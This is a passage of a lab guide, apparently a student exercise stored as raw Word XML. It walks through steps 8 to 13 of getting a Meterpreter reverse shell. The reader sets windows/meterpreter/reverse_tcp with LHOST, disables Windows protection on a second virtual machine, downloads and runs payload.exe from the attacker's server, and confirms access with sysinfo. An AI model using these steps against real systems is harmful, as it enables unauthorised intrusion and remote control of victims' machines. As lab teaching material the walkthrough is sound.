      <w:r w:rsidRPr="00E72296" w:rsidR="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E72296" w:rsidP="00BE6EAA" w:rsidRDefault="00E72296" w14:paraId="4ADC8D1C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve"> to your </w:t>
      </w:r>
      <w:r w:rsidR="00BE6EAA">
        <w:t>our system</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:t xml:space="preserve">’s IP and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="002D5907">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the chosen port commad:-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E72296" w:rsidP="00E72296" w:rsidRDefault="00E72296" w14:paraId="4ADC8D1D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST 192.168.153.131 (NOTE:- IP Address in Step 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E72296" w:rsidP="00E72296" w:rsidRDefault="00E72296" w14:paraId="4ADC8D1E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D1F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D20" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D5E" wp14:editId="4A5E6F2C">
            <wp:extent cx="5731510" cy="32219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DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D21" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D22" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D23" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D24" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D25" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D26" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D27" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D28" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D29" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D2A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D2B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D2C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D2D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D2E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D2F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D30" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 9:-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00E72296" w14:paraId="4ADC8D31" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Another virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:t xml:space="preserve"> and Go to setting</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:t>Virus and Threat Protection</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:t xml:space="preserve"> Off all the firewalls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00FD4DB4" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D32" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Then in chrome type this 192.168.153.131/payload.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Note that IP address should the same as you mention in Step3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D33" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D34" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D60" wp14:editId="21E78823">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="00DD0571" w:rsidP="00FD4DB4" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D35" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00DD0571" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D36" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 10:-</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>After running this you will see the file is downloading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D37" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D38" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D39" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D62" wp14:editId="4765A7EA">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D3A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D3B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D3C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D3D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 11:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4" w:rsidR="00FD4DB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4" w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>o to downloads and open the payload file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D3E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00FD4DB4" w:rsidR="00DD0571" w:rsidP="00FD4DB4" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D3F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4DB4">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Then go to kali linux virtual machine we have get the access of the another virtual machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00304CEC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D64" wp14:editId="3876FA1B">
            <wp:extent cx="5731510" cy="32219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72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D40" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00FD4DB4" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D41" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D42" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 12:-</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4" w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">To check the access of the victim machine run the following command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D43" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4DB4">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D44" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D66" wp14:editId="4CA386CB">
            <wp:extent cx="5731510" cy="32219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DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D45" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00FD4DB4" w:rsidP="00534361" w:rsidRDefault="00FD4DB4" w14:paraId="4ADC8D46" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">If the command runs that means your have successfully get access (hacked) of that victims system </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D47" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D48" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007868CB" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D49" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 13:-</w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">At the end </w:t>
      </w:r>
      <w:r w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>go to 1</w:t>
      </w:r>
      <w:r w:rsidRPr="007868CB" w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> window of terminal and </w:t>
      </w:r>
      <w:r w:rsidR="00FD4DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">stop </w:t>
      </w:r>
      <w:r w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>the apache2 server by following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007868CB" w:rsidP="007868CB" w:rsidRDefault="007868CB" w14:paraId="4ADC8D4A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="007868CB" w:rsidR="00DD0571" w:rsidP="007868CB" w:rsidRDefault="007868CB" w14:paraId="4ADC8D4B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="125"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007868CB">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidRPr="007868CB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>service apache2 stop</w:t>
      </w:r>
